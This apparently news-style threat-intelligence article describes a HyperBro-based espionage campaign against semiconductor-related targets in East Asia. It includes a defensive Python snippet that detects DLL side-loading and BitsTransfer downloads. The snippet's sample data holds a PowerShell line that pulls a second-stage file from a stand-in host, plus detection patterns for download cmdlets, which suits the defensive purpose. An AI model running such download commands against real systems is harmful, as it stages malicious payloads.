East Asia’s Semiconductor Industry Targeted in New Espionage Campaign
In a comprehensive investigation, analysts at EclecticIQ have unearthed a sophisticated cyber-espionage operation aimed at Mandarin/Chinese-speaking East Asian regions, notably Taiwan, Hong Kong, and Singapore. The assailants leveraged a HyperBro loader variant and cunningly cloaked their malicious intent with a ruse related to Taiwan Semiconductor Manufacturing (TSMC).
This campaign displays significant overlaps with tactics, techniques, and procedures (TTPs) previously linked to cyber espionage initiatives backed by the People’s Republic of China (PRC). The centerpiece of this attack is the HyperBro loader variant, malware known for executing the Cobalt Strike beacon in memory; Cobalt Strike is a tool originally developed for penetration testing that has since been co-opted by malicious actors. To perfect their subterfuge, the threat actors employed a previously undocumented malware downloader that makes use of the BitsTransfer module in PowerShell.
Not stopping there, the culprits also compromised a Cobra DocGuard server. This was likely done to house a Go-based backdoor, aptly named “ChargeWeapon” by the EclecticIQ team. This backdoor’s main function is to extract and relay information about a compromised system to its controller.
One notable strategy used in this attack was DLL side-loading, a technique known for its efficacy in bypassing defenses. Leveraging legitimate applications, attackers can invoke malicious payloads, thus evading detection. Moreover, the assailants took advantage of the victim’s familiarity with TSMC, presenting them with a TSMC-themed PDF decoy, written in traditional Mandarin, after deploying the HyperBro loader. This cunning diversion ensured the target remained unsuspecting.
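Two of the behaviours described above, the BitsTransfer-based PowerShell downloader and DLL side-loading, leave traces in ordinary endpoint telemetry. The following Python is an added example, not code from EclecticIQ or the report; it assumes Sysmon image-load events and PowerShell script-block events with the field names shown, and runs on constructed sample events rather than data from the campaign.

```python
"""Triage heuristics for the side-loading and BitsTransfer behaviours above.
Event shapes follow Sysmon Event ID 7 (Image, ImageLoaded, Signed) and
PowerShell Event ID 4104 (ScriptBlockText); sample events are constructed."""
import re
from pathlib import PureWindowsPath

WINDOWS_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")


def is_sideload_candidate(event: dict) -> bool:
    """True when an unsigned DLL is loaded from the host executable's own
    directory, outside the Windows system directories. Legitimate
    app-private DLLs also match, so treat hits as triage leads; a production
    rule would also compare the DLL name against those resident in System32."""
    host_dir = str(PureWindowsPath(event["Image"]).parent).lower()
    dll_dir = str(PureWindowsPath(event["ImageLoaded"]).parent).lower()
    if dll_dir.startswith(WINDOWS_DIRS):
        return False
    unsigned = str(event.get("Signed", "")).lower() != "true"
    return dll_dir == host_dir and unsigned


BITS_CMDLETS = re.compile(r"Import-Module\s+BitsTransfer|Start-BitsTransfer", re.I)
REMOTE_URL = re.compile(r"""https?://[^\s'"]+""", re.I)


def bits_download_urls(script_block: str) -> list:
    """Return remote URLs fetched through the BitsTransfer module in one
    script block; empty when the module is not used."""
    if not BITS_CMDLETS.search(script_block):
        return []
    return REMOTE_URL.findall(script_block)


# Constructed sample telemetry: one side-loading pattern, one benign load.
SAMPLE_IMAGE_LOADS = [
    {"Image": r"C:\Users\u\Downloads\vendor_tool\viewer.exe",
     "ImageLoaded": r"C:\Users\u\Downloads\vendor_tool\version.dll",
     "Signed": "false"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
]
SAMPLE_SCRIPT_BLOCK = (
    "Import-Module BitsTransfer\n"
    "Start-BitsTransfer -Source 'http://example.invalid/stage2.dat' "
    "-Destination $env:TEMP\n"
)

if __name__ == "__main__":
    print([is_sideload_candidate(e) for e in SAMPLE_IMAGE_LOADS])
    print(bits_download_urls(SAMPLE_SCRIPT_BLOCK))
```

Both checks are deliberately noisy on their own; in practice they are correlated with each other and with process ancestry before an alert is raised.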
Interestingly, these deceptive tactics are not new. EclecticIQ’s findings resonate with those of Recorded Future, which recently reported on the activities of a Chinese state-sponsored group named RedHotel. The parallels between the two reports are unmistakable, from the similar PDB file paths to the use of Cobalt Strike.
Furthermore, referencing past reports, it’s evident that the HyperBro malware family has been active since 2018, often associated with the APT27 group. This group has a history of using the DLL side-loading technique, and while the recent campaign saw the same strategy employed, there were no further overlaps identified with APT27.
But what stands out is the exploitation of the Cobra DocGuard servers. Reports from Symantec and ESET have noted that these servers have previously been abused for targeting organizations in Hong Kong. Both reports attribute these malicious activities to APT groups backed by the PRC.
This elaborate cyber espionage campaign reveals the ever-evolving strategies of cyber adversaries. The seamless integration of multiple malicious tools and techniques, combined with a deep understanding of regional nuances, makes such campaigns extremely potent. As cyber espionage continues to be a tool of choice for state-backed actors, industries worldwide must remain vigilant and invest in robust cyber defense mechanisms.